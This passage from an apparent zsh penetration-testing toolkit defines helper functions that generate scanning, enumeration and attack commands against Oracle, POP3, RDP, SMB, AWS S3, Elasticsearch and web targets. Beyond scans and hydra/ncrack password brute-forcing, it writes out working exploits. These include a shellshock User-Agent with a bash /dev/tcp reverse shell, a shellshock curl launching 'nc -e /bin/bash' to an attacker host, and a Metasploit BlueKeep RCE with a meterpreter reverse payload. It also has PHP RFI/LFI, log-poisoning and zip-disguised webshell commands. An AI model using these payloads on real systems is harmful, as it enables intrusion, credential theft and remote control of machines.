port 111 and port 2049 -w $(__hostpath)/nfs.pcap" } qq-enum-nfs-show() { qq-vars-set-rhost print -z "showmount -e ${__RHOST}" } qq-enum-nfs-mount() { qq-vars-set-rhost local share && __askvar share SHARE mkdir -p /mnt/${share} print -z "mount -t nfs ${__RHOST}:/${share} /mnt/${share} -o nolock" } ================================================ FILE: modules/qq-enum-oracle.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-oracle ############################################################# qq-enum-oracle-help() { cat << "DOC" qq-enum-oracle --------------s The qq-enum-oracle namespace contains commands for scanning and enumerating Oracle services and databases. Commands -------- qq-enum-oracle-install: installs dependencies qq-enum-oracle-nmap-sweep: scan a network for services qq-enum-oracle-tcpdump: capture traffic to and from a host qq-enum-oracle-sqlplus: sqlplus client qq-enum-oracle-odat: odat anonymous enumeration qq-enum-oracle-odat-creds: odat authenticated enumeration qq-enum-oracle-odat-passwords: odat password brute qq-enum-oracle-version: tnscmd version query qq-enum-oracle-status: tnscmd status query qq-enum-oracle-sidguess: tnscmd password brute force qq-enum-oracle-oscanner: oscanner enumeration qq-enum-oracle-hydra-listener: brute force passwords qq-enum-oracle-hydra-sid: brute force passwords DOC } qq-enum-oracle-install() { __info "Running $0..." __pkgs tcpdump nmap odat tnscmd10g sidguess oscanner hydra __pkgs oracle-instantclient-sqlplus sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf"; sudo ldconfig } qq-enum-oracle-nmap-sweep() { __check-project qq-vars-set-network print -z "sudo nmap -n -Pn -sS -p 1521 ${__NETWORK} -oA $(__netpath)/oracle-sweep" } qq-enum-oracle-tcpdump() { __check-project qq-vars-set-iface qq-vars-set-rhost print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 1521 -w $(__hostpath)/oracle.pcap" } qq-enum-oracle-sqlplus() { qq-vars-set-rhost local sid && __askvar sid "SID(DATABASE)" local u && __askvar u "USER" local p && __askvar [u] "PASSWORD" print -z "sqlplus ${u}/${p}@${__RHOST}:1521/${sid} as sysdba" } qq-enum-oracle-odat() { qq-vars-set-rhost print -z "odat all -s ${__RHOST}" } qq-enum-oracle-odat-creds() { qq-vars-set-rhost local sid && __askvar sid "SID(DATABASE)" local u && __askvar u "USER" local p && __askvar [u] "PASSWORD" print -z "odat all -s ${__RHOST} -p 1521 -d ${sid} -U ${u} -P ${p}" } qq-enum-oracle-odat-passwords() { qq-vars-set-rhost local sid && __askvar sid "SID(DATABASE)" __info "cat /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt | sed -e "s/[[:space:]]/\\\/g"" print -z "odat passwordguesser -s ${__RHOST} -d ${sid} --accounts-file accounts.txt" } qq-enum-oracle-version(){ qq-vars-set-rhost print -z "tnscmd10g version -h ${__RHOST}" } qq-enum-oracle-status(){ qq-vars-set-rhost print -z "tnscmd10g status -h ${__RHOST}" } qq-enum-oracle-sidguess(){ qq-vars-set-rhost print -z "sidguess host=${__RHOST} port=1521 sidfile=sid.txt" } qq-enum-oracle-oscanner() { qq-vars-set-rhost print -z "oscanner -s ${__RHOST}" } qq-enum-oracle-hydra-listener() { __check-project qq-vars-set-rhost __check-user print -z "hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/oracle-listener-hydra-brute.txt ${__RHOST} Oracle Listener" } qq-enum-oracle-hydra-sid() { __check-project qq-vars-set-rhost __check-user print -z "hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/oracle-sid-hydra-brute.txt ${__RHOST} Oracle Sid" } ================================================ FILE: modules/qq-enum-pop3.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-pop3 ############################################################# qq-enum-pop3-help() { cat << "DOC" qq-enum-pop3 ------------ The qq-enum-pop3 namespace contains commands for scanning and enumerating POP3 email services. Commands -------- qq-enum-pop3-install: installs dependencies qq-enum-pop3-nmap-sweep: scan a network for services qq-enum-pop3-tcpdump: capture traffic to and from a host qq-enum-pop3-hydra: brute force passwords for a user account DOC } qq-enum-pop3-install() { __info "Running $0..." __pkgs nmap tcpdump hydra } qq-enum-pop3-nmap-sweep() { __check-project qq-vars-set-network print -z "sudo nmap -n -Pn -sS -p 110,995 ${__NETWORK} -oA $(__netpath)/pop3-sweep" } qq-enum-pop3-tcpdump() { __check-project qq-vars-set-iface qq-vars-set-rhost print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 110 and port 995 -w $(__hostpath)/pop3.pcap" } qq-enum-pop3-hydra() { __check-project qq-vars-set-rhost __check-user print -z "hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/pop3-hydra-brute.txt ${__RHOST} POP3" } ================================================ FILE: modules/qq-enum-rdp.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-rdp ############################################################# qq-enum-rdp-help() { cat << "DOC" qq-enum-rdp ------------ The qq-enum-rdp namespace contains commands for scanning and enumerating RDP remote desktop services. Commands -------- qq-enum-rdp-install: installs dependencies qq-enum-rdp-nmap-sweep: scan a network for services qq-enum-rdp-tcpdump: capture traffic to and from a host qq-enum-rdp-ncrack: brute force passwords for a user account qq-enum-rdp-bluekeep: bluekeep exploit reference qq-enum-rdp-msf-bluekeep-scan: bluekeep metasploit scanner qq-enum-rdp-msf-bluekeep-exploit: bluekeep metasploit exploit DOC } qq-enum-rdp-install() { __info "Running $0..." __pkgs nmap tcpdump ncrack metasploit-framework } qq-enum-rdp-nmap-sweep() { __check-project qq-vars-set-network print -z "nmap -n -Pn -sS -p3389 ${__NETWORK} -oA $(__netpath)/rdp-sweep" } qq-enum-rdp-tcpdump() { __check-project qq-vars-set-iface qq-vars-set-rhost print -z "tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 3389 -w $(__hostpath)/rdp.pcap" } qq-enum-rdp-ncrack() { __check-project qq-vars-set-rhost __check-user print -z "ncrack -vv --user ${__USER} -P ${__PASSLIST} rdp://${__RHOST} -oN $(__hostpath)/ncrack-rdp.txt " } qq-enum-rdp-bluekeep() { __info "https://sploitus.com/exploit?id=EDB-ID:47683" print -z "searchsploit bluekeep" } qq-enum-rdp-msf-bluekeep-scan() { __check-project qq-vars-set-rhost local cmd="use auxiliary/scanner/rdp/cve_2019_0708_bluekeep; set RHOSTS ${__RHOST}; run; exit" print -z "msfconsole -n -q -x \" ${cmd} \" | tee $(__hostpath/bluekeep-scan.txt)" } qq-enum-rdp-msf-bluekeep-exploit() { qq-vars-set-rhost qq-vars-set-lhost qq-vars-set-lport #__warn "Start a handler using on ${__LHOST}:${__LPORT} before proceeding" __msf << VAR use windows/rdp/cve_2019_0708_bluekeep_rce; set RHOSTS ${__RHOST}; set PAYLOAD windows/x64/meterpreter/reverse_https; set stagerverifysslcert true; set HANDLERSSLCERT ${__SHELL_SSL_CERT}; set LHOST ${__LHOST}; set LPORT ${__LPORT}; run; exit VAR } ================================================ FILE: modules/qq-enum-smb.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-smb ############################################################# qq-enum-smb-help() { cat << "DOC" qq-enum-smb ------------ The qq-enum-smb namespace contains commands for scanning and enumerating smb services. Commands -------- qq-enum-smb-install: installs dependencies qq-enum-smb-nmap-sweep: scan a network for services qq-enum-smb-tcpdump: capture traffic to and from a host qq-enum-smb-null-smbmap: query with smbmap null session qq-enum-smb-user-smbmap: query with smbmap authenticated session qq-enum-smb-null-enum4: enumerate with enum4linux qq-enum-smb-null-smbclient-list: list shares with a null session qq-enum-smb-null-smbclient-connect: connect with a null session qq-enum-smb-user-smbclient-connect: connect with an authenticated session qq-enum-user-smb-mount: mount an SMB share qq-enum-smb-samrdump: dump info using impacket qq-enum-smb-responder: spoof and get responses using responder qq-enum-smb-net-use-null: print a net use statement for windows qq-enum-smb-nbtscan: scan a local network qq-enum-smb-rpcclient: use rcpclient for queries DOC } qq-enum-smb-install() { __info "Running $0..." __pkgs nmap tcpdump smbmap enum4linux smbclient impacket-scripts responder nbtscan rpcclient } qq-enum-smb-nmap-sweep() { __check-project qq-vars-set-network print -z "nmap -n -Pn -sS -sU -p445,137-139 ${__NETWORK} -oA $(__netpath)/smb-sweep" } qq-enum-smb-tcpdump() { __check-project qq-vars-set-iface qq-vars-set-rhost print -z "tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 445 -w $(__hostpath)/smb.pcap" } qq-enum-smb-null-smbmap() { qq-vars-set-rhost print -z "smbmap -H ${__RHOST}" } qq-enum-smb-user-smbmap() { qq-vars-set-rhost __check-user __info "Usage with creds: -u -p -d " print -z "smbmap -u ${__USER} -H ${__RHOST}" } qq-enum-smb-null-enum4() { qq-vars-set-rhost print -z "enum4linux -a ${__RHOST} | tee $(__hostpath)/enum4linux.txt " } qq-enum-smb-null-smbclient-list() { qq-vars-set-rhost print -r -z "smbclient -L \\\\\\\\${__RHOST} -N " } qq-enum-smb-null-smbclient-connect() { qq-vars-set-rhost __check-share print -r -z "smbclient \\\\\\\\${__RHOST}\\\\${__SHARE} -N " } qq-enum-smb-user-smbclient-connect() { qq-vars-set-rhost __check-user __check-share print -r -z "smbclient \\\\\\\\${__RHOST}\\\\${__SHARE} -U ${__USER} " } qq-enum-user-smb-mount() { qq-vars-set-rhost __check-user local p && __askvar p PASSWORD __check-share print -z "mount //${__RHOST}/${__SHARE} /mnt/${__SHARE} -o username=${__USER},password=${p}" } qq-enum-smb-samrdump() { qq-vars-set-rhost print -z "python3 ${__IMPACKET}/samrdump.py ${__RHOST}" } qq-enum-smb-responder() { qq-vars-set-iface print -z "responder -I ${__IFACE} -A" } qq-enum-smb-net-use-null() { qq-vars-set-rhost __info "net use \\\\\\\\${__RHOST}\\IPC$ \"\" /u:\"\" " } qq-enum-smb-nbtscan() { qq-vars-set-network print -z "nbtscan ${__NETWORK}" } qq-enum-smb-rpcclient() { qq-vars-set-rhost print -z "rpcclient -U \" \" ${__RHOST}" } ================================================ FILE: modules/qq-enum-web-aws.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-web-aws ############################################################# qq-enum-web-aws-help() { cat << "DOC" qq-enum-web-aws --------------- The qq-enum-web-aws namespace contains commands for scanning and enumerating AWS hosted services. Commands -------- qq-enum-web-aws-install: installs dependencies qq-enum-web-aws-s3-ls: use the awscli to list files in an S3 bucket qq-enum-web-aws-s3-write: use the awscli to copy a local file to an S3 bucket qq-enum-web-aws-s3-scanner: scan a list of buckets DOC } qq-enum-web-aws-install() { __info "Running $0..." __pkgs awscli qq-install-s3scanner } qq-enum-web-aws-s3-ls() { qq-vars-set-rhost print -z "aws s3 ls s3://${__RHOST} --recursive" } qq-enum-web-aws-s3-write() { qq-vars-set-rhost __ask "Select a file to copy to the S3 bucket" local f && __askpath f FILE $(pwd) print -z "aws s3 cp \"${f}\" s3://${__RHOST}" } qq-enum-web-aws-s3-scanner() { __ask "Select a file that contains a list of S3 buckets" local f && __askpath f FILE $(pwd) __info "Use -d to dump buckets to local path" print -z "python3 ${__TOOLS}/S3Scanner/s3scanner.py ${f}" } ================================================ FILE: modules/qq-enum-web-dirs.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-web-dirs ############################################################# qq-enum-web-dirs-help() { cat << "DOC" qq-enum-web-dirs ---------------- The qq-enum-web-dirs namespace contains commands for discovering web content, directories and files. Commands -------- qq-enum-web-dirs-install: installs dependencies qq-enum-web-dirs-robots: get robots.txt using curl qq-enum-web-dirs-parsero: parse complex robots.txt with parsero qq-enum-web-dirs-wfuzz: brute force dirs and files with wfuzz qq-enum-web-dirs-ffuf: brute force dirs and files with ffuf qq-enum-web-dirs-gobuster: brute force dirs and files with gobuster DOC } qq-enum-web-dirs-install() { __info "Running $0..." __pkgs parsero gobuster wfuzz curl seclists wordlists qq-install-golang go get -u github.com/ffuf/ffuf go get -v -u github.com/tomnomnom/httprobe } qq-enum-web-dirs-robots() { __check-project qq-vars-set-url print -z "curl -s -L --user-agent \"${__UA}\" \"${__URL}/robots.txt\" | tee $(__urlpath)/robots.txt" } qq-enum-web-dirs-parsero() { __check-project qq-vars-set-url print -z "parsero -u \"${__URL}\" -o -sb | tee $(__urlpath)/robots.txt" } qq-enum-web-dirs-wfuzz() { __check-project qq-vars-set-url qq-vars-set-wordlist local d && __askvar d "RECURSION DEPTH" print -z "wfuzz -s 0.1 -R${d} --hc=404 -w ${__WORDLIST} ${__URL}/FUZZ --oF $(__urlpath)/wfuzz-dirs.txt" } qq-enum-web-dirs-ffuf() { __check-project qq-vars-set-url qq-vars-set-wordlist __check-threads local d && __askvar d "RECURSION DEPTH" print -z "ffuf -p 0.1 -t ${__THREADS} -recursion -recursion-depth ${d} -H \"User-Agent: Mozilla\" -fc 404 -w ${__WORDLIST} -u ${__URL}/FUZZ -o $(__urlpath)/ffuf-dirs.csv -of csv" } qq-enum-web-dirs-gobuster() { __check-project qq-vars-set-url qq-vars-set-wordlist __check-threads print -z "gobuster dir -u ${__URL} -a \"${__UA}\" -t1 -k -w ${__WORDLIST} | tee $(__urlpath)/gobuster-dirs.txt " } ================================================ FILE: modules/qq-enum-web-eslastic.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-web-elastic ############################################################# qq-enum-web-elastic-help() { cat << "DOC" qq-enum-web-elastic ------------------- The qq-enum-web-elastic namespace contains commands for scanning and enumerating elastic search services. Commands -------- qq-enum-web-elastic-install: installs dependencies qq-enum-web-elastic-nmap: scan the target using the elasticsearch nmap nse script qq-enum-web-elastic-health: query the target using curl for cluster health qq-enum-web-elastic-indices: query the target using curl for indices qq-enum-web-elastic-search: query an index using curl qq-enum-web-elastic-all: query for 1000 records in an index using curl DOC } qq-enum-web-elastic-install() { __info "Running $0..." __pkgs nmap curl qq-install-nmap-elasticsearch-nse } qq-enum-web-elastic-nmap() { __check-project qq-vars-set-rhost print -z "sudo nmap -n -Pn -p9200 --script=elasticsearch ${__RHOST} -oN $(__hostpath)/nmap-elastic.txt" } qq-enum-web-elastic-health() { qq-vars-set-url print -z "curl -A \"${__UA}\" -XGET \"${__URL}:9200/_cluster/health?pretty\"" } qq-enum-web-elastic-indices() { qq-vars-set-url print -z "curl -A \"${__UA}\" -XGET \"${__URL}:9200/_cat/indices?v\"" } qq-enum-web-elastic-search() { qq-vars-set-url local i && __askvar i "INDEX" __ask "Enter a query, such as *:password" local q && __askvar q "QUERY" print -z "curl -A \"${__UA}\" -XGET \"${__URL}:9200/${i}/_search?q=${q}&size=10&pretty\"" } qq-enum-web-elastic-all() { __check-project qq-vars-set-url local i && __askvar i "INDEX" print -z "curl -A \"${__UA}\" -XGET \"${__URL}:9200/${i}/_search?size=1000\" | tee $(__urlpath)/elastic-docs.json" } ================================================ FILE: modules/qq-enum-web-fuzz.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-web-fuzz ############################################################# qq-enum-web-fuzz-help() { cat << "DOC" qq-enum-web-fuzz -------------- The qq-enum-web-fuzz namespace contains commands for fuzzing inputs of web applications Commands -------- qq-enum-web-fuzz-install: installs dependencies qq-enum-web-fuzz-auth-basic-payloads: generate base64 encoded credentials qq-enum-web-fuzz-auth-basic-ffuf: brute force basic auth qq-enum-web-fuzz-auth-json-ffuf: brute force basic auth with json post qq-enum-web-fuzz-auth-post-ffuf: brute force auth with post qq-enum-web-fuzz-auth-post-wfuzz: brute force auth with post qq-enum-web-brute-hydra-get: brute force auth with get qq-enum-web-brute-hydra-form-post: brute force auth with post DOC } qq-enum-web-fuzz-install() { __info "Running $0..." __pkgs seclists wordlists wfuzz hydra qq-install-golang go get -u github.com/ffuf/ffuf } qq-enum-web-fuzz-auth-basic-payloads() { qq-vars-set-wordlist __check-user print -z "file=\"${f}\"; while IFS= read line; do; echo -n \"${__USER}:\$line\" | base64 ; done <\"\$file\" > payloads.b64" } # ffuf qq-enum-web-fuzz-auth-basic-ffuf() { qq-vars-set-url __ask "Select file containing authorization header payloads" local f && __askpath f FILE $(pwd) __check-threads print -z "ffuf -t ${__THREADS} -p \"0.1\" -w ${f} -H \"Authorization: Basic FUZZ\" -fc 401 -u ${__URL} " } qq-enum-web-fuzz-auth-json-ffuf() { qq-vars-set-url __check-threads print -z "ffuf -t ${__THREADS} -p \"0.1\" -w /usr/share/seclists/Fuzzing/Databases/NoSQL.txt -u ${__URL} -X POST -H \"Content-Type: application/json\" -d '{\"username\": \"FUZZ\", \"password\": \"FUZZ\"}' -fr \"error\" " } qq-enum-web-fuzz-auth-post-ffuf() { qq-vars-set-url local uf && __askvar uf USER_FIELD local uv && __askvar uv USER_VALUE local pf && __askvar pf PASSWORD_FIELD __check-threads print -z "ffuf -t ${__THREADS} -p \"0.1\" -w ${__PASSLIST} -H \"Content-Type: application/x-www-form-urlencoded\" -X POST -d \"${uf}=${uv}&${pf}=FUZZ\" -u ${__URL} -fs 75 " } # wfuzz qq-enum-web-fuzz-auth-post-wfuzz() { qq-vars-set-url local uf && __askvar uf USER_FIELD local uv && __askvar uv USER_VALUE local pf && __askvar pf PASSWORD_FIELD print -z "wfuzz -c -w ${__PASSLIST} -d \"${uf}=${uv}&${pf}=FUZZ\" --sc 302 ${__URL}" } qq-enum-web-brute-hydra-get() { qq-vars-set-rhost __check-user __ask "Enter the URI for the get request, ex: /path" local uri && __askvar uri URI print -z "hydra -l ${__USER} -P ${__PASSLIST} ${__RHOST} http-get ${uri}" } qq-enum-web-brute-hydra-form-post() { qq-vars-set-rhost __ask "Enter the URI for the post request, ex: /path" local uri && __askvar uri URI local uf && __askvar uf USER_FIELD local uv && __askvar uv USER_VALUE local pf && __askvar pf PASSWORD_FIELD __ask "Enter the response value to check for failure" local fm && __askvar fm FAILURE print -z "hydra ${__RHOST} http-form-post \"${uri}:${uf}=^USER^&${pf}=^PASS^:${fm}\" -l ${uv} -P ${__PASSLIST} -t 10 -w 30 " } ================================================ FILE: modules/qq-enum-web-js.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-web-js ############################################################# qq-enum-web-js-help() { cat << "DOC" qq-enum-web-js -------------- The qq-enum-web-js namespace contains commands for enumerating javascript files and mining for urls and secrets. Commands -------- qq-enum-web-js-install: installs dependencies qq-enum-web-js-beautify: beautify JS file qq-enum-web-js-link-finder-url: run linkfinder on a file qq-enum-web-js-link-finder-domain: run linkfinder on all files of a site qq-enum-web-js-curl: enumerate links using curl DOC } qq-enum-web-js-install() { __info "Running $0..." __pkgs jsbeautifier qq-install-link-finder qq-install-node npm i -g eslint } qq-enum-web-js-beautify() { local f && __askpath f FILE $(pwd) print -z "js-beautify ${f} > source-$(basename ${f})" } qq-enum-web-js-link-finder-url() { __check-project __ask "Set the URL of a javascript file" qq-vars-set-url print -z "python3 linkfinder.py -i ${__URL} -o $(__urlpath)/js-links.html" } qq-enum-web-js-link-finder-domain() { __check-project qq-vars-set-url print -z "python3 linkfinder.py -i ${__URL} -d -o $(__urlpath)/js-links-all.html" } qq-enum-web-js-curl() { qq-vars-set-url curl -Lks ${__URL} | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=${__URL} '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"'##### %\";curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"('#####.*)|(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\" | sort -fu" | tr -d "'\"" } ================================================ FILE: modules/qq-enum-web-php.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-web-php ############################################################# qq-enum-web-php-help() { cat << "DOC" qq-enum-web-php ---------------- The qq-enum-web-php namespace contains commands for discovering web content, directories and files on PHP web servers Commands -------- qq-enum-web-php-install: installs dependencies qq-enum-web-php-ffuf: scan for PHP files qq-enum-web-php-rfi: exploit typical RFI params qq-enum-web-php-rfi-input qq-enum-web-php-lfi-proc-self-environ qq-enum-web-php-lfi-filter-resource qq-enum-web-php-lfi-zip-jpg-shell qq-enum-web-php-lfi-logfile qq-enum-web-php-gen-htaccess: generate an htaccess file qq-enum-web-php-phpinfo: generate phpinfo payload DOC } qq-enum-web-php-install() { __info "Running $0..." __pkgs curl seclists wordlists qq-install-golang go get -u github.com/ffuf/ffuf go get -v -u github.com/tomnomnom/httprobe } qq-enum-web-php-ffuf() { __check-project qq-vars-set-url qq-vars-set-wordlist __check-threads local d && __askvar d "RECURSION DEPTH" print -z "ffuf -p 0.1 -t ${__THREADS} -recursion -recursion-depth ${d} -H \"User-Agent: Mozilla\" -fc 404 -w ${__WORDLIST} -u ${__URL}/FUZZ -e ${__EXT_PHP} -o $(__urlpath)/ffuf-dirs-php.csv -of csv" } qq-enum-web-php-rfi() { __ask "URL should contain a URI like /page.php?rfi=" qq-vars-set-url __ask "PAYLOAD URL should contain reverse php shell" local p && __askvar p PAYLOAD_URL print -z "curl -k -v -XGET \"${__URL}${p}%00\" " } qq-enum-web-php-rfi-input() { __ask "URL should contain a URI like /page.php?rfi=" qq-vars-set-url print -z "curl -k -v -XPOST --data \"\" \"${__URL}php://input%00\" " } qq-enum-web-php-lfi-proc-self-environ() { __ask "URL should contain a URI like /page.php?lfi=" qq-vars-set-url print -z "curl -k -v -A \"\" \"${__URL}../../../proc/self/environ\" " } qq-enum-web-php-lfi-filter-resource(){ __ask "URL should contain a URI like /page.php?lfi=" qq-vars-set-url __ask "Set path to a remote file" local f && __askvar f REMOTE_FILE print -z "curl -k -v -XGET \"${__URL}php://filter/convert.base64-encode/resource=${f}\" " } qq-enum-web-php-lfi-zip-jpg-shell() { __ask "URL should contain a URI like /page.php?lfi=" qq-vars-set-url echo "
" > payload.php zip payload.zip payload.php mv payload.zip shell.jpg __info "Created shell.jpg" __warn "First upload shell.jpg to target" print -z "curl -k -v -XGET \"${__URL}zip://shell.jpg%23payload.php?cmd=\" " } qq-enum-web-php-lfi-logfile() { __ask "URL should contain a URI like /page.php?lfi=" qq-vars-set-url local b && __askvar b "TARGET URL" curl -s "${b}/" __info "lfi request completed" print -z "curl -k -v \"${__URL}../../../../../var/log/apache2/access.log&cmd=whoami\" " } qq-enum-web-php-gen-htaccess() { local e && __askvar e Extension __ask "Upload .htaccess file to make alt extension executable by PHP" print -z "echo \"AddType application/x-httpd-php ${e}\" > htaccess" } qq-enum-web-php-phpinfo() { print -z "echo \"

PHP INFO PAGE


\" > phpinfo.php" } ================================================ FILE: modules/qq-enum-web-ssl.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-web-ssl ############################################################# qq-enum-web-ssl-help() { cat << "DOC" qq-enum-web-ssl ---------------- The enum-web-ssl namespace contains commands for enumerating SSL/TLS. Commands -------- qq-enum-web-ssl-install: installs dependencies qq-enum-web-ssl-tcpdump: capture traffic to and from target qq-enum-web-ssl-der-to-crt: convert a .der file to .crt qq-enum-web-ssl-crt-ca-install: install a root certificate (.crt) qq-enum-web-ssl-certs: display cert from a url qq-enum-web-ssl-cert-download: download certs from a url qq-enum-web-ssl-testssl-full: qq-enum-web-ssl-testssl-ciphers: DOC } qq-enum-web-ssl-install() { __info "Running $0..." __pkgs curl nmap tcpdump openssl testssl } qq-enum-web-ssl-tcpdump() { __check-project qq-vars-set-iface qq-vars-set-rhost print -z "tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 443 -w $(__hostpath)/ssl.pcap" } qq-enum-web-ssl-der-to-crt() { __ask "Select the cacert.der file" local f && __askpath f FILE $(pwd) print -z "sudo openssl x509 -inform DER -in ${f} -out cacert.crt" } qq-enum-web-ssl-crt-ca-install() { __ask "Select the cacert.crt file" local f && __askpath f FILE $(pwd) print -z "sudo cp ${f} /usr/local/share/ca-certificates/. && sudo update-ca-certificates" } qq-enum-web-ssl-certs() { qq-vars-set-url print -z "openssl s_client -showcerts -connect ${__URL}:443" } qq-enum-web-ssl-cert-download() { __check-project qq-vars-set-url local d=$(echo "${__URL}" | cut -d/ -f3) print -z "openssl s_client -servername ${d} -connect ${d}:443 $(__urlpath)/ssl.certificate.`date +"%Y%m%d-%H%M%S"`.pem" } qq-enum-web-ssl-testssl-full() { __check-project qq-vars-set-url print -z "testssl --color=3 -oA $(__urlpath)/testssl.full.`date +"%Y%m%d-%H%M%S"` ${__URL} " } qq-enum-web-ssl-testssl-ciphers() { __check-project qq-vars-set-url print -z "testssl -E --color=3 -oA $(__urlpath)/testssl.ciphers.`date +"%Y%m%d-%H%M%S"` ${__URL} " } ================================================ FILE: modules/qq-enum-web-vuln.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-web-vuln ############################################################# qq-enum-web-vuln-help() { cat << "DOC" qq-enum-web-vuln ---------------- The enum-web-vuln namespace contains commands for discovering web vulnerabilities. Commands -------- qq-enum-web-vuln-install: installs dependencies qq-enum-web-vuln-nikto: scan a target for web vulnerabilities qq-enum-web-vuln-nmap-rfi: scan for potential rfi uri's qq-enum-web-vuln-shellshock-agent: create a shellshock payload for user-agent qq-enum-web-vuln-shellshock-nc: attempt shellshock with a reverse shell payload qq-enum-web-vuln-put-curl: attempt to PUT a file with curl qq-enum-web-vuln-padbuster-check: test for padbuster qq-enum-web-vuln-padbuster-forge: exploit with padbuster DOC } qq-enum-web-vuln-install() { __info "Running $0..." __pkgs nikto curl nmap padbuster } qq-enum-web-vuln-nikto() { __check-project qq-vars-set-url print -z "nikto -useragent \"${__UA}\" -h \"${__URL}\" -o $(__urlpath)/nikto.txt" } qq-enum-web-vuln-nmap-rfi() { qq-vars-set-rhost print -z "nmap -vv -n -Pn -p80 --script http-rfi-spider --script-args http-rfi-spider.url='/' ${__RHOST}" } qq-enum-web-vuln-shellshock-agent() { qq-vars-set-lhost qq-vars-set-lport __ok "Copy the header value below to use in your exploit" cat << DOC User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/${__LHOST}/${__LPORT} 0>&1 DOC } qq-enum-web-vuln-shellshock-nc() { qq-vars-set-lhost qq-vars-set-lport qq-vars-set-rhost __warn "Start a netcat listener for ${__LHOST}:${__LPORT}" print -z "curl -A '() { :; }; /bin/bash -c \"/usr/bin/nc ${__LHOST} ${__LPORT} -e /bin/bash\"' \"http://${__RHOST}/cgi-bin/status\"" } qq-enum-web-vuln-put-curl() { qq-vars-set-rhost local f && __askpath f FILE $(pwd) print -z "curl -L -T ${f} \"http://${__RHOST}/${f}\" " } qq-enum-web-vuln-padbuster-check() { qq-vars-set-rhost local cn && __askvar cn "COOKIE NAME" local cv && __askvar cv "COOKIE VALUE" print -z "padbuster ${__RHOST} ${cv} 8 -cookies ${cn}=${cv} -encoding 0" } qq-enum-web-vuln-padbuster-forge() { qq-vars-set-rhost local cn && __askvar cn "COOKIE NAME" local cv && __askvar cv "COOKIE VALUE" __check-user print -z "padbuster ${__RHOST} ${cv} 8 -cookies ${cn}=${cv} -encoding 0 -plaintext user=${__USER}" } ================================================ FILE: modules/qq-enum-web.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-enum-web ############################################################# qq-enum-web-help() { cat << "DOC" qq-enum-web ----------- The qq-enum-web namespace contains commands for scanning and enumerating http services. Commands -------- qq-enum-web-install: installs dependencies qq-enum-web-tcpdump: capture traffic to and from a host qq-enum-web-nmap-sweep: nmap sweep scan to discover web servers on a network qq-enum-web-whatweb: enumerate web server and platform information qq-enum-web-waf: enumerate WAF information qq-enum-web-vhosts-gobuster: brute force for virtual hosts qq-enum-web-eyewitness: scrape screenshots from target URL qq-enum-web-wordpress: enumerate Wordpress information qq-enum-web-headers: grab headers from a target url using curl qq-enum-web-mirror: mirrors the target website locally DOC } qq-enum-web-install() { __info "Running $0..." __pkgs tcpdump nmap whatweb wafw00f gobuster eyewitness wpscan wget curl seclists wordlists go get -u github.com/jaeles-project/gospider go get -u github.com/hakluke/hakrawler } qq-enum-web-nmap-sweep() { __check-project qq-vars-set-network print -z "sudo nmap -n -Pn -sS -p80,443,8080 ${__NETWORK} -oA $(__netpath)/web-sweep" } qq-enum-web-tcpdump() { __check-project qq-vars-set-iface qq-vars-set-rhost print -z "sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 80 -w $(__hostpath)/web.pcap" } qq-enum-web-whatweb() { __check-project qq-vars-set-url print -z "whatweb ${__URL} -a 3 | tee $(__urlpath)/whatweb.txt" } qq-enum-web-waf() { __check-project qq-vars-set-url print -z "wafw00f ${__URL} -o $(__urlpath)/waf.txt" } # vhosts qq-enum-web-vhosts-gobuster() { __check-project qq-vars-set-url local w && __askpath w FILE /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt __check-threads print -z "gobuster vhost -u ${__URL} -w ${w} -a \"${__UA}\" -t ${__THREADS} -o $(__urlpath)/vhosts.txt" } # screens qq-enum-web-eyewitness() { __check-project qq-vars-set-url mkdir -p $(__urlpath)/screens print -z "eyewitness --web --no-dns --no-prompt --single ${__URL} -d $(__urlpath)/screens --user-agent \"${__UA}\" " } # apps qq-enum-web-wordpress() { __check-project qq-vars-set-url print -z "wpscan --ua \"${__UA}\" --url ${__URL} --enumerate tt,vt,u,vp -o $(__urlpath)/wpscan.txt" } qq-enum-web-headers() { __check-project qq-vars-set-url print -z "curl -s -X GET -I -L -A \"${__UA}\" \"${__URL}\" | tee $(__urlpath)/headers.txt" } qq-enum-web-mirror() { __warn "The destination site will be mirrored in the current directory" qq-vars-set-url print -z "wget -mkEpnp ${__URL} " } qq-enum-web-gospider() { __check-project qq-vars-set-url print -z "gospider -s "${__URL}" -o $(__urlpath)/spider.txt" } qq-enum-web-hakrawler() { __check-project qq-vars-set-url local d && __askvar d DEPTH print -z 